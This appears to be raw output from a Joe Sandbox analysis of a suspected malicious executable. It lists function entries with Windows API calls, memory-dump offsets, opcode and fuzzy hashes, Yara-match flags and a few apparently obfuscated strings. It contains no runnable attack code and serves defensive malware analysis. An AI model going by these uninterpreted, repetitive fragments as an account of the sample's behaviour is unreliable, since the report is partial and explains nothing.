                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Value___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 1426506684-0
                                                                                • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction ID: d0d2b0819cf24f656b98bf94b3291f4e2d55ba1f49ccb1cd89c4ba89ab8a555c
                                                                                • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                                                • Instruction Fuzzy Hash: 6401243A3092119FB7A42FB4BC849666B9AEB05678730023AEB18950E0FF1F7D126145
                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                                                • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                                                  • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                                                • ___initconout.LIBCMT ref: 1000CD55
                                                                                  • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                                • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                                                • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                                • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
                                                                                • GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC
                                                                                  • Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082
                                                                                • ___initconout.LIBCMT ref: 04B5B0BC
                                                                                  • Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047
                                                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                                • Instruction ID: 54ca15ac29abb2cc356db3baf26df87052cd03596aeb9704bf31b045e8cf73b7
                                                                                • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                                • Instruction Fuzzy Hash: EFF03036901114BFCF226FA1DC08ADDBF26FF086A4F094460FE1E96130C632A961DB95
                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                                                • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                                                  • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                                                • ___initconout.LIBCMT ref: 0041AE55
                                                                                  • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                                • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                                                • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                                • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                                                APIs
                                                                                • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                                                • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                                                • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                                                • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                • String ID:
                                                                                • API String ID: 3269011525-0
                                                                                • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                                • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                                                • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                                • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                                • Instruction ID: 12f4833f8b8a1d31d6e10bc5345a735741ec32fe814f549f0ad83bf325a8db3d
                                                                                • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                                • Instruction Fuzzy Hash: CBE0EC71B13320AA97336F14BD40A4AFF61EBD4B143C5803AE50023271C77629539BDE
                                                                                APIs
                                                                                • _free.LIBCMT ref: 04B50CB6
                                                                                  • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                                                  • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                                                • _free.LIBCMT ref: 04B50CC9
                                                                                • _free.LIBCMT ref: 04B50CDA
                                                                                • _free.LIBCMT ref: 04B50CEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                                • Instruction ID: 2a638163b3dbc4a5c9aadf3cbc1385501b8d40215370a85339a438bd3f7c2bfd
                                                                                • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                                • Instruction Fuzzy Hash: 52E0EC79E13334AAD6366F18BD40649FF69EBD8B143C50076E83012270C7322553ABCE
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00410A4F
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                • _free.LIBCMT ref: 00410A62
                                                                                • _free.LIBCMT ref: 00410A73
                                                                                • _free.LIBCMT ref: 00410A84
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                                • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                                                • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                                • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                                • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                                                • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                                • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                                • API String ID: 0-2740803753
                                                                                • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                                • Instruction ID: a738876d3c2ff8ac166625f641da9be7d3e0f88f925c14354a04c58037eea498
                                                                                • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                                • Instruction Fuzzy Hash: 6D416671A00218AFDB21EF9DDC81AAEFBB8EFC5314B5000A6E805D7261E770AA41DB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\dI3n4LSHB7.exe
                                                                                • API String ID: 0-2740803753
                                                                                • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                                • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                                                • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                                • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                                                APIs
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 3480331319-1018135373
                                                                                • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction ID: d8fea0a21baf093387e28021d95f836c02d33f5530b8aa594742145cc105e3b7
                                                                                • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction Fuzzy Hash: CA41C470A40218ABCF10DF68C884A9EBFB4EF89318F1485D5EC18AB351D735FA15DBA1
                                                                                APIs
                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2118026453-2084237596
                                                                                • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                                • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                                                • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                                • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                                                APIs
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 04B4B711
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2118026453-2084237596
                                                                                • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                                • Instruction ID: 923960378f10a42f4d89f9f1eca47e0f2ee5ca5c2c0ddb50a050844d7370f4e8
                                                                                • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                                • Instruction Fuzzy Hash: 53415871900209AFDF15CF98C881AEEBBB5FF88314F158099FA15A7211D335F950EB50
                                                                                APIs
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2118026453-2084237596
                                                                                • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                                • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                                                • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                                • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 04CF07BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: FEKN$NE]D
                                                                                • API String ID: 1385522511-517842756
                                                                                • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                                • Instruction ID: 4a3ff25f89580d27e5092a2c1f9e2e3ab16a9b8995b014d160fc7b73ff1bc844
                                                                                • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                                • Instruction Fuzzy Hash: 78215A30B00645CBE720DF28EC45BA837A1FB45308FD44279D9145B362EBB93685CBD9
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B41622
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                                • String ID: FEKN$NE]D
                                                                                • API String ID: 4132704954-517842756
                                                                                • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                                • Instruction ID: c6b6ce85a24c3fb136392ac9d6bd6c39d7965e59de907ef64728266f1d67071b
                                                                                • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                                • Instruction Fuzzy Hash: D3214870B00245CBEB20DF38E849BA977A0EFD5308F9442A9D8141B261EBB57586D7CE
                                                                                APIs
                                                                                  • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                                  • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                                • __Init_thread_footer.LIBCMT ref: 004013BB
                                                                                  • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                                  • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                                  • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                • String ID: FEKN$NE]D
                                                                                • API String ID: 2296764815-517842756
                                                                                • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                                • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                                                • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                                • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 04CF712E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 1385522511-3597986494
                                                                                • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                                • Instruction ID: 1731ede49108323c556952bbfab0d93331e320457b3e6952282b60f1bb63ecc1
                                                                                • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                                • Instruction Fuzzy Hash: 5E014930F002049BD760FF68BC009AC73B6F744304FD84179D61857240EB7879459BD9
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 04CF6B6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 1385522511-3597986494
                                                                                • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                                • Instruction ID: 747a83191185ad56394dded9cb9ba93b3f1b74eca79b9a3740be4b17d2eb17e9
                                                                                • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                                • Instruction Fuzzy Hash: A4014970F002089BCB20FFA8AD4066CB3B1E704314F808279D61857250EB387945ABD5
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B47F95
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 4132704954-3597986494
                                                                                • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                                • Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
                                                                                • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                                • Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B479D5
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                                • String ID: CD^O$_DC[
                                                                                • API String ID: 4132704954-3597986494
                                                                                • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                                • Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
                                                                                • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                                • Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9
                                                                                APIs
